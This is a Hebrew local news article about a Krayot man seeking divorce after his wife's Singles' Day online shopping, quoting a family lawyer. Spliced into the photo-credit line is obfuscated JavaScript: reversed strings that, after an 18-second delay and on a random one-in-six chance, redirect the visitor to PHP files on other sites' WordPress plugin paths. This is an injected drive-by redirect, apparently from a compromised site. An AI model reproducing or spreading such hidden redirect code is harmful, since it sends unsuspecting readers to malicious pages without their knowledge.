fbpx
[shortcode-weather-atlas city_selector=1178243 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

יום הרווקים הסיני הוביל לגירושים

תושב הקריות הגיש בקשת גירושים מאשתו בגלל קניות באינטרנט
צילום: shutterstock
צילום: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

יום הרווקים הסיני שבו מובטחות לציבור הנחות גדולות על מוצרים שונים, מאופיין בקדחת קניות בינלאומית. אולם מתברר כי יום הרווקים הסיני הוא גם היום שבו החליט תושב הקריות להגיש תביעת גירושים נגד אשתו לאחר שזו הוציאה כספים על קניות.

בני הזוג נשואים שש שנים ולהם שני ילדים, הבעל עובד כנהג אוטובוס ותקופת הקורונה הביאה עימה ירידה חדה בהיקף העבודה שלו, בעיקר בסופי שבוע ובהסעות של קבוצות מטיילים.

עו"ד אמיתי בן נון. צילום עצמי

כשעבר הבעל על פירוט האשראי הוא ראה עסקה חריגה בגובה של כ- 3,500 שקלים לאתרי מכירות. כשהעלה את הנושא מול אשתו, גילה כי ביום הרווקים הסיני ערכה אשתו קניות באינטרנט בסכום שהבעל לא יכול יותר היה להישאר אדיש למעשיה, בעיקר על רקע המצב הכלכלי הבעייתי של המשפחה, והוא פנה לעו"ד אמיתי בן נון וביקש להגיש לבית המשפט לענייני משפחה בקשה לפירוק שיתוף והתרת הנישואין של הצדדים.

עו"ד בן נון:כעקרון, "נישואין בין בני זוג מושתתים על רכיב של אמון הדדי" מסביר עו"ד בן נון "במקרים רבים ייתכן מצב שבו אחד מבני הזוג אף אינו מודע לבעיות כלכליות שאליהן נקלע בן הזוג השני, כגון כישלון עסקי, חובות עקב הימורים, הסתבכות עם השוק האפור, פתיחת הליכים בבית המשפט או בהוצאה לפועל וכדומה. כאשר נודע לבן הזוג אודות ההסתבכות הכלכלית שנוצרה, נוצרות האשמות בין בני הזוג והאמון ביניהם נפגע קשות".

אהבתם? שתפו!

אולי גם יעניין אותך

שיתוף ברשתות החברתיות